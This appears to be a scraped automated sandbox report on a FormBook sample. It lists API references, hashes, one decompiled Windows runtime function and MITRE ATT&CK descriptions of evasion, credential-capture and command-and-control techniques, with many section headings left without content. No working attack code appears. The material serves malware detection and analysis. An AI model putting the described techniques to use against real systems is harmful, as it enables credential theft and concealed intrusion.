Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,00AD8CF4,?), ref: 00ADF6CB

Memory Dump Source

Source File: 00000017.00000002.492458360.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 7ea49bcfd7eb89cfce1dd1d38e7dcc5e35a49d50de701d0c82c68256bf4518e3
Instruction ID: e9538f16186cc4a4428b6aad33009e288850861e84452ad6461363e11b6bfa7b
Opcode Fuzzy Hash: 7ea49bcfd7eb89cfce1dd1d38e7dcc5e35a49d50de701d0c82c68256bf4518e3
Instruction Fuzzy Hash: E2D0A7717903043BE610FBA99C03F6732CD6B44B00F490074FA49D73C3D950E4004165

Uniqueness

Uniqueness Score: -1.00%

Function 04FC967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FC9694

Memory Dump Source

Source File: 00000017.00000002.506619622.0000000004F60000.00000040.00000001.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000017.00000002.507773905.000000000507B000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.507819215.000000000507F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bd05d0aa4d1402e34db50f96b087aec852e5dd9a0347d8f9e349ca0705cb179c
Instruction ID: bdbb9e0077509cba3ba9beac40f4bdc8a4a3412f345679e27e16989acd86b0bc
Opcode Fuzzy Hash: bd05d0aa4d1402e34db50f96b087aec852e5dd9a0347d8f9e349ca0705cb179c
Instruction Fuzzy Hash: A6B09BB1D414C5C5F711D7604708B17790177D0745F16C055D1021645A4779D096F6B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0501FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0501FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E04FCCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E05015720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E05015720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x0501fdda
0x0501fde2
0x0501fde5
0x0501fdec
0x0501fdfa
0x0501fdff
0x0501fe0a
0x0501fe0f
0x0501fe17
0x0501fe1e
0x0501fe19
0x0501fe19
0x0501fe19
0x0501fe20
0x0501fe21
0x0501fe22
0x0501fe25
0x0501fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0501FDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0501FE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0501FE2B

Memory Dump Source

Source File: 00000017.00000002.506619622.0000000004F60000.00000040.00000001.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000017.00000002.507773905.000000000507B000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.507819215.000000000507F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 4dc6f23df1b7cc2e71b892f596bfd760a78182250aa0cfe429a1f49ec9306504
Instruction ID: 23f9836acc36e9122491d3d1ef1a391b5538d011a1d20f8713cc053e9df3dbbe
Opcode Fuzzy Hash: 4dc6f23df1b7cc2e71b892f596bfd760a78182250aa0cfe429a1f49ec9306504
Instruction Fuzzy Hash: 75F02B32204201BFE7211A45ED06F67BF9BEB84730F150315FA285A1D1DA62F8719BF9

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Ms5nQdSz5l.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre